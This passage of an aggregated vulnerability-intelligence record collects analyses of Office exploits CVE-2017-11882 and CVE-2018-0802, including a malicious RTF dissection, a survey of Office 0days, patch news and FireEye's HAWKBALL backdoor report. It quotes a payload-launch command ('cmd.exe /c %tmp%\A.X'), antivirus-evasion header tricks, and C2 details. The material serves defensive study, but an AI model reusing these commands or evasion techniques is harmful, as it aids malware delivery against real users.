\n\nII. RTF analysis \n1. Document structure analysis \n![](/Article/UploadPic/2018-12/20181225205545186.png) \nAnalysing the attack document with rtfobj finds two embedded objects: a Package object and an Excel.Sheet.8 object, as shown in the figure. The Package object's original file was \"C:\\Users\\n3o\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Content.Word\\A.X\". From this we can see the document author's [operating system](<http://www.myhack58.com/Article/48/Article_048_1.htm>) user name: n3o. \nA.X is the dropped malicious PE file. \nThe other object is an embedded Excel sheet; we extract it, rename its suffix to .xls and open it in Excel. It contains two objects, AAAA and bbbb, both \"Equation.3\" objects, as shown below. \n![](/Article/UploadPic/2018-12/20181225205545928.png) \nExtracting the Excel sheet object, its document structure is shown below. \n![](/Article/UploadPic/2018-12/20181225205545742.png) \nThe sheet includes two Microsoft Equation 3.0 objects with CLSID \"0002ce02-0000-0000-c000-000000000046\", MBD0002E630 and MBD0002E631; their modification time is 2018/5/21 17:52. \n![](/Article/UploadPic/2018-12/20181225205545793.png) \nIn addition, the Ole10Native streams of the two \"Microsoft Equation 3.0\" objects are 59 bytes and 160 bytes in size and contain \"cmd.exe /c %tmp%\\A.X\", used to execute the A.X process. This should be the combined use of the two vulnerabilities CVE-2017-11882 and CVE-2018-0802. \nThus we have a basic understanding of the sample; its overall flow is shown in the diagram below. \n![](/Article/UploadPic/2018-12/20181225205545654.png) \n2. Static analysis of the document \nOpening the file in WinHex, the first Package object can be found at file offset 0x2A8A. 
Wherein 0x00137158 refers to the size of the object, that is, the decimal 1274200, it is the release of A. X size. Followed by IS PE file in winhex we can see that the author put the PE head 0x4D5A has been modified, inserted in the middle 0x090d is divided, so that it becomes[0x090d]4[0x090d]d[0x090d]5[0x090d]a[0x090d], in fact, is 0x4d5a, such an operation should be in order to avoid certain anti-virus of Avira, not directly to 0x4d5a9000 the look of the rendering, a look that is clearly of the PE file. Specific as shown below: \n! [](/Article/UploadPic/2018-12/20181225205545840. png) \nAnother object in 0x299061 position, is an Exce. Sheet. 8 object. Its size is 0x00005C00, that is, the decimal 23552, and rtfobj extracted exel size consistent. The author of the compound document header has changed, with 0x0909 is divided, so that d0cf11 at the beginning of the composite document into the d[0x0909]0[0x0909]\u3002 Should also be a certain sense of[free to kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>)\n\n**[1] [[2]](<92510_2.htm>) [[3]](<92510_3.htm>) [next](<92510_2.htm>)**\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-12-25T00:00:00", "type": "myhack58", "title": "A use cve-2017-11882 and cve-2018-0802 combination of vulnerability a malicious document analysis-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", 
"confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "modified": "2018-12-25T00:00:00", "id": "MYHACK58:62201892510", "href": "http://www.myhack58.com/Article/html/3/62/2018/92510.htm", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-06-13T15:28:22", "description": "This article is an extended summary of my presentation at Bluehat Shanghai 2019. In it I summarise the Office-related 0day/1day vulnerabilities from 2010 to 2018. I go through each type of vulnerability once, and for each vulnerability I reference and categorise the related analysis articles. \nI hope this article can help those who go on to do Office vulnerability research. \n\nOverview \nFrom 2010 to 2018, 0day/1day attacks against Office never stopped. The CVE numbers below are the 0day/1day vulnerabilities for which I specifically observed real attack samples in the course of my research (there may be some omissions, which readers are welcome to supplement). \nLet us first look at the specific CVE numbers. 
\nYear | Number \n---|--- \n2010 | CVE-2010-3333 \n2011 | CVE-2011-0609/CVE-2011-0611 \n2012 | CVE-2012-0158/CVE-2012-0779/CVE-2012-1535/CVE-2012-1856 \n2013 | CVE-2013-0634/CVE-2013-3906 \n2014 | CVE-2014-1761/CVE-2014-4114/CVE-2014-6352 \n2015 | CVE-2015-0097/CVE-2015-1641/CVE-2015-1642/CVE-2015-2424/CVE-2015-2545/CVE-2015-5119/CVE-2015-5122/CVE-2015-7645 \n2016 | CVE-2016-4117/CVE-2016-7193/CVE-2016-7855 \n2017 | CVE-2017-0199/CVE-2017-0261/CVE-2017-0262/CVE-2017-8570/CVE-2017-8759/CVE-2017-11826/CVE-2017-11882/CVE-2017-11292 \n2018 | CVE-2018-0798/CVE-2018-0802/CVE-2018-4878/CVE-2018-5002/CVE-2018-8174/CVE-2018-8373/CVE-2018-15982 \n\nLet us first classify the vulnerabilities above by component type. Note that Flash is itself also an ActiveX control; in the classification table below I treat it as a separate class. \n\nComponent type | Number \n---|--- \nRTF control word parsing problem | CVE-2010-3333/CVE-2014-1761/CVE-2016-7193 \nOpen XML tag parsing problem | CVE-2015-1641/CVE-2017-11826 \nActiveX control parsing problem | CVE-2012-0158/CVE-2012-1856/CVE-2015-1642/CVE-2015-2424/CVE-2017-11882/CVE-2018-0798/CVE-2018-0802 \nOffice embedded Flash vulnerabilities | CVE-2011-0609/CVE-2011-0611/CVE-2012-0779/CVE-2012-1535/CVE-2013-0634/CVE-2015-5119/CVE-2015-5122/CVE-2015-7645/CVE-2016-4117/CVE-2016-7855/CVE-2017-11292/CVE-2018-4878/CVE-2018-5002/CVE-2018-15982 \nOffice TIFF image parsing vulnerability | CVE-2013-3906 \nOffice EPS file parsing vulnerability | CVE-2015-2545/CVE-2017-0261/CVE-2017-0262 \nLoading via Moniker vulnerabilities | CVE-2017-0199/CVE-2017-8570/CVE-2017-8759/CVE-2018-8174/CVE-2018-8373 \nOther Office logic vulnerabilities | CVE-2014-4114/CVE-2014-6352/CVE-2015-0097 \n\nWe then classify the non-Flash vulnerabilities above by vulnerability type. 
For a summary of the Flash vulnerabilities you can refer to other researchers' articles. \n\nVulnerability type | Number \n---|--- \nStack overflow (Stack Overflow) | CVE-2010-3333/CVE-2012-0158/CVE-2017-11882/CVE-2018-0798/CVE-2018-0802 \nOut-of-bounds write (Out-of-bound Write) | CVE-2014-1761/CVE-2016-7193 \nType confusion (Type Confusion) | CVE-2015-1641/CVE-2017-11826/CVE-2017-0262 \nUse after free (Use After Free) | CVE-2012-1856/CVE-2015-1642/CVE-2015-2424/CVE-2015-2545/CVE-2017-0261/CVE-2018-8174/CVE-2018-8373 \nInteger overflow (Integer Overflow) | CVE-2013-3906 \nLogic vulnerabilities (Logical vulnerability) | CVE-2014-4114/CVE-2014-6352/CVE-2015-0097/CVE-2017-0199/CVE-2017-8570/CVE-2017-8759 \n\nNext, following the second table above, we look at these vulnerabilities one by one, leaving the Flash vulnerabilities aside. \n\nRTF control word parsing problem \nCVE-2010-3333 \nThis vulnerability was found by wushi, head of Keen Lab. It is a stack overflow vulnerability. \nThere are many analysis articles about this vulnerability on the Kanxue forum; a few of them are listed below. \nCVE-2010-3333 vulnerability analysis (in-depth analysis) \nMS10-087 from vulnerability to patch to POC \nChapter 2, Section 4 of the book Vulnerability Wars also describes this vulnerability fairly systematically; interested readers can read the relevant chapter. \nCVE-2014-1761 \nThis vulnerability is a 0day discovered by Google. It is a heap out-of-bounds write vulnerability. \nHaifei Li did a very fine analysis of this vulnerability. \nA Close Look at RTF Zero-Day Attack CVE-2014-1761 Shows Sophistication of Attackers \nThe Kanxue forum also has two high-quality analysis articles on this vulnerability. \nCVE-2014-1761 analysis notes \nms14-017 (cve-2014-1761) study notes, which mention how to configure the correct environment \nAnquanke also has a high-quality analysis of this vulnerability. 
\nTeaching you hands-on how to construct Office exploit EXPs (part 3) \nIn addition, South Korea's AhnLab also published a report on this vulnerability. \nAnalysis of Zero-Day Exploit_Issue 01 Microsoft Word RTF Vulnerability CVE-2014-1761 \nSomething to be aware of when debugging this vulnerability is that some samples have fairly strict requirements on the environment needed to trigger it; the article above mentions how to set up a suitable experimental environment. \nCVE-2016-7193 \nThis vulnerability is a 0day reported to Microsoft by the Austrian Military Cyber Emergency Readiness Team. \nIt is also a heap out-of-bounds write vulnerability. \nBaidu Security Lab has done a fairly complete analysis of this vulnerability. \nAPT attack weapon: the Word vulnerability CVE-2016-7193 principle revealed \nI have also shared an article analysing how this vulnerability is exploited. \nConstructing a calculator-popping CVE-2016-7193 exploit from an in-the-wild sample \n\nOpen XML tag parsing problem \nCVE-2015-1641 \nOne of the 2015 0days listed in Google's 0day summary table. \nThis is a type confusion vulnerability. \nFortinet has written an analysis article about this vulnerability. \nThe Curious Case Of The Document Exploiting An Unknown Vulnerability \u2013 Part 1 \nAlibaba Security also wrote an excellent analysis of this vulnerability. \nWord type confusion vulnerability CVE-2015-1641 analysis \nAnquanke also has an excellent analysis of this vulnerability. \nTeaching you hands-on how to construct Office exploit EXPs (part 4) \nKnownsec 404 Lab also wrote an excellent analysis of this vulnerability. \nCVE-2015-1641 Word exploit sample analysis \nI have also written an article sharing the principles of this vulnerability. 
\nAnalysis ideas for the Open XML tag parsing class of vulnerabilities \nWhen debugging Office samples of this kind that involve heap spraying, pay special attention to the fact that debugger intervention tends to affect the process heap layout, in particular some of the heap option settings. If the sample's behaviour cannot be triggered normally under the debugger, which often happens when the sample is launched directly from the debugger, you can try double-clicking the sample first and then attaching the debugger.\n", "cvss3": {}, "published": "2019-06-13T00:00:00", "type": "myhack58", "title": "Office vulnerabilities 2010-2018 from a macro perspective - vulnerability warning - the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2545", "CVE-2012-1856", "CVE-2012-1535", "CVE-2017-11292", "CVE-2018-8174", "CVE-2018-4878", "CVE-2011-0609", "CVE-2017-11882", "CVE-2018-0802", "CVE-2016-7855", "CVE-2017-8570", "CVE-2016-4117", "CVE-2012-0158", "CVE-2015-1642", "CVE-2010-3333", "CVE-2013-0634", "CVE-2015-5119", "CVE-2013-3906", "CVE-2014-4114", "CVE-2016-7193", "CVE-2018-15982", "CVE-2015-2424", "CVE-2018-8373", "CVE-2011-0611", "CVE-2015-5122", "CVE-2017-0199", "CVE-2015-0097", "CVE-2018-5002", "CVE-2018-0798", "CVE-2014-1761", "CVE-2014-6352", "CVE-2017-8759", "CVE-2015-1641", "CVE-2015-7645", "CVE-2017-11826", "CVE-2017-0262", "CVE-2012-0779", "CVE-2017-0261"], "modified": 
"2019-06-13T00:00:00", "id": "MYHACK58:62201994516", "href": "http://www.myhack58.com/Article/html/3/62/2019/94516.htm", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "krebs": [{"lastseen": "2018-01-27T09:59:37", "description": "**Microsoft** on Tuesday released 14 security updates, including fixes for the **Spectre** and **Meltdown** flaws detailed last week, as well as a zero-day vulnerability in **Microsoft Office** that is being exploited in the wild. Separately, **Adobe** pushed a security update to its **Flash Player** software.\n\nLast week's story, [Scary Chip Flaws Raise Spectre of Meltdown](<https://krebsonsecurity.com/2018/01/scary-chip-flaws-raise-spectre-of-meltdown/>), sought to explain the gravity of these two security flaws present in most modern computers, smartphones, tablets and mobile devices. The bugs are thought to be mainly exploitable in chips made by **Intel** and **ARM**, but researchers said it was possible they also could be leveraged to steal data from computers with chips made by **AMD**.\n\nBy the time that story had published, Microsoft had already begun shipping an emergency update to address the flaws, but many readers complained that their PCs experienced the dreaded \"[blue screen of death](<https://krebsonsecurity.com/2010/03/secret-obsession-odd-windows-crash-alerts/>)\" (BSOD) after applying the update. 
Microsoft warned that the BSOD problems were attributable to many antivirus programs not yet updating their software to play nice with the security updates.\n\nOn Tuesday, Microsoft said it was suspending the patches for computers running AMD chipsets.\n\n\"After investigating, Microsoft determined that some AMD chipsets do not conform to the documentation previously provided to Microsoft to develop the Windows operating system mitigations to protect against the chipset vulnerabilities known as Spectre and Meltdown,\" the company said in [a notice posted to its support site](<https://support.microsoft.com/en-us/help/4073707/windows-os-security-update-block-for-some-amd-based-devices?ranMID=24542&ranEAID=nOD%2FrLJHOac&ranSiteID=nOD_rLJHOac-_HQEBR_XRHQKxjSSaNyFXQ&tduid=\\(c438b93529abd1646060d8789010252e\\)\\(256380\\)\\(2459594\\)\\(nOD_rLJHOac-_HQEBR_XRHQKxjSSaNyFXQ\\)\\(\\)>).\n\n\"To prevent AMD customers from getting into an unbootable state, Microsoft has temporarily paused sending the following Windows operating system updates to devices that have impacted AMD processors,\" the company continued. \"Microsoft is working with AMD to resolve this issue and resume Windows OS security updates to the affected AMD devices via Windows Update and WSUS as soon as possible.\"\n\nIn short, if you're running Windows on a computer powered by an AMD, you're not going to be offered the Spectre/Meltdown fixes for now. Not sure whether your computer has an Intel or AMD chip? Most modern computers display this information (albeit very briefly) when the computer first starts up, before the Windows logo appears on the screen.\n\nHere's another way. From within Windows, users can find this information by pressing the Windows key on the keyboard and the \"Pause\" key at the same time, which should open the System Properties feature. 
The chip maker will be displayed next to the \"Processor:\" listing on that page.\n\nMicrosoft also on Tuesday [provided more information](<https://cloudblogs.microsoft.com/microsoftsecure/2018/01/09/understanding-the-performance-impact-of-spectre-and-meltdown-mitigations-on-windows-systems/>) about the potential performance impact on Windows computers after installing the Spectre/Meltdown updates. To summarize, Microsoft said **Windows 7**, **8.1** and **10** users on older chips (circa 2015 or older), as well as Windows server users on any silicon, are likely to notice a slowdown of their computer after applying this update.\n\nAny readers who experience a BSOD after applying January's batch of updates may be able to get help from Microsoft's site: Here are the corresponding help pages for [Windows 7](<https://support.microsoft.com/en-us/help/17074/windows-7-resolving-stop-blue-screen-errors>), [Windows 8.1](<https://support.microsoft.com/en-us/help/17075/windows-8-resolving-blue-screen-errors>) and [Windows 10](<https://support.microsoft.com/en-us/help/14238/windows-10-troubleshoot-blue-screen-errors>) users.\n\nAs evidenced by this debacle, it's a good idea to get in the habit of backing up your system on a regular basis. I typically do this at least once a month -- but especially right before installing any updates from Microsoft. \n\nAttackers could exploit a zero-day vulnerability in Office ([CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>)) just by getting a user to open a booby-trapped Office document or visit a malicious/hacked Web site. 
Microsoft also patched a flaw ([CVE-2018-0819](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0819>)) in **Office for Mac** that was publicly disclosed prior to the patch being released, potentially giving attackers a heads up on how to exploit the bug.\n\nOf the 56 vulnerabilities addressed in the January Patch Tuesday batch, at least 16 earned Microsoft's critical rating, meaning attackers could exploit them to gain full access to Windows systems with little help from users. For more on Tuesday's updates from Microsoft, check out blogs from [Ivanti](<https://www.ivanti.com/blog/january-patch-tuesday-2017/>) and [Qualys](<https://blog.qualys.com/laws-of-vulnerabilities/2018/01/09/january-patch-tuesday-meltdown-spectre-16-critical-microsoft-patches-1-adobe-patch>).\n\nAs per usual, Adobe issued an update for Flash Player yesterday. The update brings Flash to _version 28.0.0.137_ on Windows, **Mac**, and **Linux** systems. Windows users who browse the Web with anything other than **Internet Explorer** may need to apply the Flash patch twice, once with IE and again using the alternative browser (Firefox, Opera, e.g.).\n\n**Chrome** and IE should auto-install the latest Flash version on browser restart (users may need to manually check for updates and/or restart the browser to get the latest Flash version). Chrome users may need to restart the browser to install or automatically download the latest version.\n\nWhen in doubt, click the vertical three dot icon to the right of the URL bar, select \u201cHelp,\u201d then \u201cAbout Chrome\u201d: If there is an update available, Chrome should install it then. Chrome will replace that three dot icon with an up-arrow inside of a circle when updates are waiting to be installed.\n\nStandard disclaimer: Because Flash remains such a security risk, I continue to encourage readers to remove or hobble Flash Player unless and until it is needed for a specific site or purpose. 
More on that approach (as well as slightly less radical solutions ) can be found in [A Month Without Adobe Flash Player](<http://krebsonsecurity.com/2015/06/a-month-without-adobe-flash-player/>). The short version is that you can probably get by without Flash installed and not miss it at all.\n\nFor readers still unwilling to cut the Flash cord, there are half-measures that work almost as well. Fortunately, [disabling Flash in Chrome](<https://support.google.com/chrome/answer/108086?hl=en>) is simple enough. Paste \u201c<chrome://settings/content>\u201d into a Chrome browser bar and then select \u201cFlash\u201d from the list of items. By default it should be set to \u201cAsk first\u201d before running Flash, although users also can disable Flash entirely here or whitelist and blacklist specific sites.\n\nAnother, perhaps less elegant, solution is to keep Flash installed in a browser that you don\u2019t normally use, and then to only use that browser on sites that require it.", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-01-10T16:07:35", "type": "krebs", "title": "Microsoft\u2019s Jan. 
2018 Patch Tuesday Lowdown", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-0802", "CVE-2018-0819"], "modified": "2018-01-10T16:07:35", "href": "https://krebsonsecurity.com/2018/01/microsofts-jan-2018-patch-tuesday-lowdown/", "id": "KREBS:4F19DF7091060B198B092ABE2F7E1AA8", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "carbonblack": [{"lastseen": "2019-12-11T13:20:10", "description": "Trend Micro released a white paper about Tick, a Chinese cyberespionage threat actor targeting east asian countries. The report details several new downloader malware families. VMware Carbon Black Threat Analysis Unit (TAU) reviewed the malware and is providing product rules to detect and identify the malware.\n\n## Behavior Summary\n\nThe Trend Micro report stated that the downloaders were deployed by using right to left override (RTLO) technique or exploiting the CVE-2018-0802 and CVE-2018-0798 vulnerabilities. The downloaders have code which is used to detect antivirus products.\n\n\n\nThe CB ThreatHunter process diagram shows the downloader activity after it is deployed by the dropper. 
Because the dropper only sets up persistence, a reboot is required before the downloader runs.\n\nAdditionally, CB Defense will display the malware\u2019s overall triggered TTPs.\n\nTo learn more, [click here.](<https://community.carbonblack.com/t5/Threat-Research-Docs/TAU-TIN-Tick-downloaders-Operation-ENDTRADE/ta-p/83641>)\n\nThe post [Threat Analysis Unit (TAU) Threat Intelligence Notification: Tick Downloaders (Operation ENDTRADE)](<https://www.carbonblack.com/2019/12/10/threat-analysis-unit-tau-threat-intelligence-notification-tick-downloaders-operation-endtrade/>) appeared first on [VMware Carbon Black](<https://www.carbonblack.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-12-10T15:34:53", "type": "carbonblack", "title": "Threat Analysis Unit (TAU) Threat Intelligence Notification: Tick Downloaders (Operation ENDTRADE)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-0798", "CVE-2018-0802"], "modified": "2019-12-10T15:34:53", "id": "CARBONBLACK:5FC3EC6D315A733A8D566BD7A42A12FE", "href": 
"https://www.carbonblack.com/2019/12/10/threat-analysis-unit-tau-threat-intelligence-notification-tick-downloaders-operation-endtrade/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "fireeye": [{"lastseen": "2018-09-11T12:50:32", "description": "On Feb. 2, 2018, we published a [blog detailing the use of an Adobe Flash zero-day vulnerability](<https://www.fireeye.com/blog/threat-research/2018/02/attacks-leveraging-adobe-zero-day.html>) (CVE-2018-4878) by a suspected North Korean cyber espionage group that we now track as APT37 (Reaper).\n\nOur analysis of APT37\u2019s recent activity reveals that the group\u2019s operations are expanding in scope and sophistication, with a toolset that includes access to zero-day vulnerabilities and wiper malware. We assess with high confidence that this activity is carried out on behalf of the North Korean government given malware development artifacts and targeting that aligns with North Korean state interests. FireEye iSIGHT Intelligence believes that APT37 is aligned with the activity publicly reported as [Scarcruft](<https://cdn.securelist.com/files/2017/10/Guerrero-Saade-Raiu-VB2017.pdf>) and [Group123](<http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html>).\n\nRead our report, _[APT37 (Reaper): The Overlooked North Korean Actor](<https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf>)_, to learn more about our assessment that this threat actor is working on behalf of the North Korean government, as well as various other details about their operations:\n\n * **Targeting:** Primarily South Korea \u2013 though also Japan, Vietnam and the Middle East \u2013 in various industry verticals, including chemicals, electronics, manufacturing, aerospace, automotive, and healthcare.\n * **Initial Infection Tactics:** Social engineering tactics tailored specifically to desired targets, strategic web compromises typical of targeted cyber espionage operations, and the use of torrent file-sharing 
sites to distribute malware more indiscriminately.\n * **Exploited Vulnerabilities:** Frequent exploitation of vulnerabilities in Hangul Word Processor (HWP), as well as Adobe Flash. The group has demonstrated access to zero-day vulnerabilities (CVE-2018-0802), and the ability to incorporate them into operations.\n * **Command and Control Infrastructure:** Compromised servers, messaging platforms, and cloud service providers to avoid detection. The group has shown increasing sophistication by improving their operational security over time.\n * **Malware:** A diverse suite of malware for initial intrusion and exfiltration. Along with custom malware used for espionage purposes, APT37 also has access to destructive malware.\n\nMore information on this threat actor is found in our report, _[APT37 (Reaper): The Overlooked North Korean Actor](<https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf>)_. You can also [register for our upcoming webinar](<https://www2.fireeye.com/WBNR-APT37-Overlooked-North-Korean-Threat.html>) for additional insights into this group.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-02-20T08:30:00", "type": "fireeye", "title": "APT37 (Reaper): The Overlooked North Korean Actor", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": 
"AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4878", "CVE-2018-0802"], "modified": "2018-02-20T08:30:00", "id": "FIREEYE:96525D6EA5DBF734A371FB66EB02FA45", "href": "https://www.fireeye.com/blog/threat-research/2018/02/apt37-overlooked-north-korean-actor.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-11-23T02:06:52", "description": "FireEye Labs recently observed an attack against the government sector in Central Asia. The attack involved the new HAWKBALL backdoor being delivered via well-known Microsoft Office vulnerabilities CVE-2017-11882 and CVE-2018-0802.\n\nHAWKBALL is a backdoor that attackers can use to collect information from the victim, as well as to deliver payloads. HAWKBALL is capable of surveying the host, creating a named pipe to execute native Windows commands, terminating processes, creating, deleting and uploading files, searching for files, and enumerating drives.\n\nFigure 1 shows the decoy used in the attack.\n\n \nFigure 1: Decoy used in attack\n\nThe decoy file, doc.rtf (MD5: AC0EAC22CE12EAC9EE15CA03646ED70C), contains an OLE object that uses Equation Editor to drop the embedded shellcode in %TEMP% with the name 8.t. This shellcode is decrypted in memory through EQENDT32.EXE. Figure 2 shows the decryption mechanism used in EQENDT32.EXE.\n\n \nFigure 2: Shellcode decryption routine\n\nThe decrypted shellcode is dropped as a Microsoft Word plugin WLL (MD5: D90E45FBF11B5BBDCA945B24D155A4B2) into C:\\Users\\ADMINI~1\\AppData\\Roaming\\Microsoft\\Word\\STARTUP (Figure 3).\n\n \nFigure 3: Payload dropped as Word plugin\n\n#### Technical Details\n\nDllMain of the dropped payload determines if the string WORD.EXE is present in the sample\u2019s command line. If the string is not present, the malware exits. 
If the string is present, the malware executes the command RunDll32.exe < C:\\Users\\ADMINI~1\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\hh14980443.wll, DllEntry> using the WinExec() function.\n\nDllEntry is the payload\u2019s only export function. The malware creates a log file in %TEMP% with the name c3E57B.tmp. The malware writes the current local time plus two hardcoded values every time in the following format:\n\n<Month int>/<Date int> <Hours>:<Minutes>:<Seconds>\\t<Hardcoded Digit>\\t<Hardcoded Digit>\\n\n\nExample:\n\n05/22 07:29:17 4 0\n\nThis log file is written to every 15 seconds. The last two digits are hard coded and passed as parameters to the function (Figure 4).\n\n \nFigure 4: String format for log file\n\nThe encrypted file contains a config file of 0x78 bytes. The data is decrypted with an 0xD9 XOR operation. The decrypted data contains command and control (C2) information as well as a mutex string used during malware initialization. Figure 5 shows the decryption routine and decrypted config file.\n\n \nFigure 5: Config decryption routine\n\nThe IP address from the config file is written to %TEMP%/3E57B.tmp with the current local time. For example:\n\n05/22 07:49:48 149.28.182.78.\n\n#### Mutex Creation\n\nThe malware creates a mutex to prevent multiple instances of execution. Before naming the mutex, the malware determines whether it is running as a system profile (Figure 6). To verify that the malware resolves the environment variable for %APPDATA%, it checks for the string **config/systemprofile.**\n\n \nFigure 6: Verify whether malware is running as a system profile\n\nIf the malware is running as a system profile, the string **d0c** from the decrypted config file is used to create the mutex. 
Otherwise, the string **_cu** is appended to **d0c** and the mutex is named **d0c_cu** (Figure 7).\n\n \nFigure 7: Mutex creation\n\nAfter the mutex is created, the malware writes another entry in the logfile in %TEMP% with the values 32 and 0.\n\n#### Network Communication\n\nHAWKBALL is a backdoor that communicates to a single hard-coded C2 server using HTTP. The C2 server is obtained from the decrypted config file, as shown in Figure 5. The network request is formed with hard-coded values such as User-Agent. The malware also sets the other fields of request headers such as:\n\n * Content-Length: <content_length>\n * Cache-Control: no-cache\n * Connection: close\n\nThe malware sends an HTTP GET request to its C2 IP address using HTTP over port 443. Figure 8 shows the GET request sent over the network.\n\n \nFigure 8: Network request\n\nThe network request is formed with four parameters in the format shown in Figure 9.\n\n**Format = \"?t=%d&&s=%d&&p=%s&&k=%d\"**\n\n \nFigure 9: GET request parameters formation\n\nTable 1 shows the GET request parameters.\n\n**Value** | **Information** \n---|--- \nt | Initially set to 0 \ns | Initially set to 0 \np | String from decrypted config at 0x68 \nk | The result of GetTickCount() \n\nTable 1: GET request parameters\n\nIf the returned response is 200, then the malware sends another GET request (Figure 10) with the following parameters (Figure 11).\n\n**Format = \"?e=%d&&t=%d&&k=%d\"**\n\n \nFigure 10: Second GET request\n\n \nFigure 11: Second GET request parameters formation\n\nTable 2 shows information about the parameters.\n\n**Value** | **Information** \n---|--- \ne | Initially set to 0 \nt | Initially set to 0 \nk | The result of GetTickCount() \n\nTable 2: Second GET request parameters\n\nIf the returned response is 200, the malware examines the Set-Cookie field. This field provides the Command ID. 
